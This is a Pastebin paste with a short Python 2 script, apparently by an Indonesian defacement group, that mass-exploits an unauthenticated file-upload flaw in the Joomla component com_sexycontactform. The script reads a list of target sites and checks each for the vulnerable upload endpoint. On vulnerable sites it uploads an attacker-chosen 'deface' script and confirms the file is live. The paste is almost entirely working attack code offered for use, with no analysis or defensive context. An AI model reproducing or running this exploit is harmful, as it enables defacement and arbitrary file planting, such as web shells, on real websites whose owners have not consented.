Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os, sys, urllib, requests, urlparse, time
- from urlparse import urlparse
- from urllib import urlopen
- Y = '\033[93m' # kuning
- R = '\033[91m' # merah
- C = '\033[96m' # Cyan
- white = "\033[1;37m"
- os.system("clear")
- print "AUTO EXPLOIT COM_SEXY "
- print "GA SUPPORT HTTPS"
- print "Author : "+R+"DarkOct02"+white+""
- print "Team : "+R+"GARUDA TERSAKTI 72"+white+"\n"
- print "%s[%s1%s]%s Mulai Gan\n" % (R, white, R, white)
- drk = raw_input("pilihan > ")
- if drk == '1':
- si = raw_input("sites.txt target : ")
- sit = open(si,'r')
- for site in sit.readlines():
- u = site.rstrip()
- ur = urlparse(u).netloc
- url = "http://"+ur
- s = url+"/components/com_sexycontactform/fileupload/index.php"
- sexy = requests.get(s).text
- print "\r"
- print "CEK ", url
- print "\r"
- time.sleep(0.2)
- if 'files' in sexy:
- print "COM_SEXY......%s[%sV U L N%s ]%s" % (R, white, R, white)
- sc = raw_input(" script deface : ")
- file = {'files[]':(sc, open(sc,'r'))}
- requests.post(s, files=file)
- cek = url+"/components/com_sexycontactform/fileupload/files/"+sc
- c = urllib.urlopen(cek).getcode()
- if c == 200:
- print "[DONE] UPLOAD ", cek
- else:
- print "[GAGAL] UPLOAD"
- else:
- print "COM_SEXY......%s[%sNOT VULN%s]%s" % (R, white, R, white)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement